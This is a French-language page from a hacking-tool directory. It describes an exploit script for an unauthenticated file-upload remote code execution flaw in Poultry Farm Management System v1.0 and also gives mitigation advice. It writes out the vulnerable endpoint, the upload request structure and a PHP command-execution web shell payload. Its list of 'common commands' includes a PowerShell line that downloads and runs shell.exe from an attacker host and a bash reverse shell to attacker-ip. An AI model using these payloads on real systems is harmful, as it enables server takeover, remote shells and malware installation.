Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2024-40110 — Exploit pour CVE-2024-40110, une exécution de code à distance (RCE) par téléchargement de fichier non authentifié dans Poultry Farm Management System v1.0. Télécharge un shell PHP pour exécuter des commandes arbitraires sur la cible. | Kitploit
Outils/GitHubGitHub/angry-althaf/cve-2024-40110
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et Éducation
GitHubangry-althaf/cve-2024-40110

CVE-2024-40110

Exploit pour CVE-2024-40110, une exécution de code à distance (RCE) par téléchargement de fichier non authentifié dans Poultry Farm Management System v1.0. Télécharge un shell PHP pour exécuter des commandes arbitraires sur la cible.

Voir le dépôt
1il y a 8 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Système de Gestion de Ferme Avicole v1.0 - Exploit RCE

Type de Vulnérabilité

Téléchargement de fichier non authentifié avec exécution de code à distance

Description

Le système de gestion de ferme avicole v1.0 contient une vulnérabilité critique dans la fonctionnalité de téléchargement de produits. L'application ne valide ni ne nettoie correctement les fichiers téléchargés, permettant aux attaquants de télécharger des fichiers PHP déguisés en images de produits. Ces fichiers PHP téléchargés peuvent être exécutés pour réaliser une exécution de code à distance.

Point de terminaison vulnérable

root@kitploit:~
POST /paultry/farm/product.php ou POST /farm/product.php

Vecteur d'attaque

La vulnérabilité peut être exploitée en :

  1. Envoyant une requête POST au point de terminaison de téléchargement de produit
  2. Téléchargeant un fichier shell PHP avec des commandes arbitraires
  3. Accédant au fichier téléchargé pour exécuter les commandes intégrées

Prérequis

Conditions préalables

  • Python 3.7+
  • Bibliothèque requests
  • Bibliothèque colorama (pour sortie colorée)
  • Accès réseau à la cible vulnérable

Installation

root@kitploit:~
pip install requests colorama

Ou installez toutes les dépendances :

root@kitploit:~
pip install -r requirements.txt

Utilisation

Utilisation de base

Exécutez le script de manière interactive :

root@kitploit:~
python exploit.py

Le script vous demandera :

  1. Adresse IP cible - L'adresse IP du serveur vulnérable
  2. Port cible - Le numéro de port (par défaut : 80)
  3. Commande à exécuter - La commande système à exécuter sur la cible

Exemple

root@kitploit:~
==================================================
Outil interactif de téléchargement de backdoor
==================================================

Entrez l'adresse IP cible : 192.168.1.100
Entrez le port cible (par défaut : 80) : 8080
Entrez la commande à exécuter (par défaut : charge utile powershell) :
Commande : whoami

==================================================
CONFIRMATION
==================================================
URL cible : http://192.168.1.100:8080
Commande : whoami
Voulez-vous continuer ? (oui/non) : oui

Fonctionnalités

✅ Saisie interactive - Demande l'IP, le port et les commandes personnalisées
✅ Valeurs par défaut - Valeurs par défaut pratiques
✅ Sortie colorée - Sortie terminal colorée facile à lire
✅ Étape de confirmation - Vérifier les paramètres avant exécution
✅ Gestion des erreurs - Messages d'erreur élégants pour les requêtes échouées
✅ Commandes flexibles - Prise en charge de toute commande shell ou payload PowerShell

Commandes courantes

Cibles Windows

root@kitploit:~
powershell -Command "Invoke-WebRequest http://attacker-ip:8787/shell.exe -OutFile shell.exe; Start-Process shell.exe"

Cibles Linux

root@kitploit:~
bash -i >& /dev/tcp/attacker-ip/4444 0>&1

Collecte d'informations

root@kitploit:~
whoami
id
ifconfig
hostname
pwd

Détails techniques

Comment ça marche

  1. Téléchargement de fichier : Envoie une requête POST avec une charge utile PHP intégrée en tant que fichier
  2. Exécution de la charge utile : Le fichier PHP téléchargé est stocké dans /assets/img/productimages/
  3. Exécution de la commande : L'accès au fichier PHP déclenche l'exécution de la commande via la fonction system()
  4. Récupération de la sortie : Le script récupère la sortie via une requête GET

Structure de la requête

root@kitploit:~
POST /paultry/farm/product.php
Content-Type: multipart/form-data

category=CHICKEN
product=rce
price=100
save=
productimage=[PHP_PAYLOAD]

Format de la charge utile

root@kitploit:~
<?php system('COMMAND_HERE');?>

Environnement de test

L'exploit a été testé sur :

  • OS : Windows 10
  • Serveur : XAMPP v3.3.0
  • Version PHP : Compatible avec PHP 5.6+

Avertissement

⚠️ AVERTISSEMENT LÉGAL

Cet outil est fourni uniquement à des fins de tests de sécurité autorisés et d'éducation. L'accès non autorisé aux systèmes informatiques est illégal.

  • Utilisez cet exploit uniquement sur des systèmes que vous possédez ou pour lesquels vous avez une autorisation écrite explicite de tester
  • Les auteurs déclinent toute responsabilité en cas d'utilisation abusive ou de dommages causés par cet outil
  • Les utilisateurs sont responsables de se conformer à toutes les lois et réglementations applicables
  • L'accès, la modification ou la perturbation non autorisés de systèmes informatiques sont un crime fédéral en vertu du Computer Fraud and Abuse Act (CFAA) et des lois similaires dans le monde

Atténuation

Pour les administrateurs

  1. Mettre à jour le logiciel - Appliquer les correctifs de sécurité si disponibles

  2. Validation du téléchargement de fichiers

    • Validez les extensions de fichiers (liste blanche : jpg, png, gif, etc.)
    • Vérifiez les types MIME côté serveur
    • Stockez les fichiers téléchargés en dehors de la racine web
    • Désactivez l'exécution de scripts dans les répertoires de téléchargement
  3. Configuration

    root@kitploit:~
    <Directory /uploads>
        php_flag engine off
        AddType text/plain .php .phtml .php3 .php4 .php5 .phar
    </Directory>
    
  4. Contrôle d'accès

    • Implémentez l'authentification avant d'autoriser les téléchargements
    • Validez les permissions des utilisateurs
    • Ajoutez une limitation de débit
  5. Surveillance

    • Surveillez les répertoires de téléchargement pour détecter les fichiers suspects
    • Consignez toutes les tentatives de téléchargement
    • Implémentez la vérification de l'intégrité des fichiers

Références

  • Exploit DB : https://www.exploit-db.com/exploits/52053
  • GitHub : https://github.com/w3bn00b3r/Unauthenticated-Remote-Code-Execution-RCE---Poultry-Farm-Management-System-v1.0/
  • Logiciel d'origine : https://www.sourcecodester.com/php/15230/poultry-farm-management-system-free-download.html

Dépannage

Connexion refusée

root@kitploit:~
Erreur : Connexion refusée
Solution : Vérifiez que l'IP et le port cibles sont corrects et que l'application est en cours d'exécution

404 Non trouvé

root@kitploit:~
Erreur : Échec du téléchargement du shell. Code d'état : 404
Solution : Le chemin du point de terminaison peut différer. Chemins courants : /farm/, /paultry/farm/

PHP non exécuté

root@kitploit:~
Erreur : La sortie de la commande est vide
Solution : L'exécution PHP peut être désactivée ou le fichier n'a pas été téléchargé correctement

Support

Pour les problèmes, questions ou améliorations, référez-vous au dépôt GitHub ou à la page Exploit-DB.


Dernière mise à jour : Décembre 2024
Statut : Vérifié et testé

Télécharger l’outil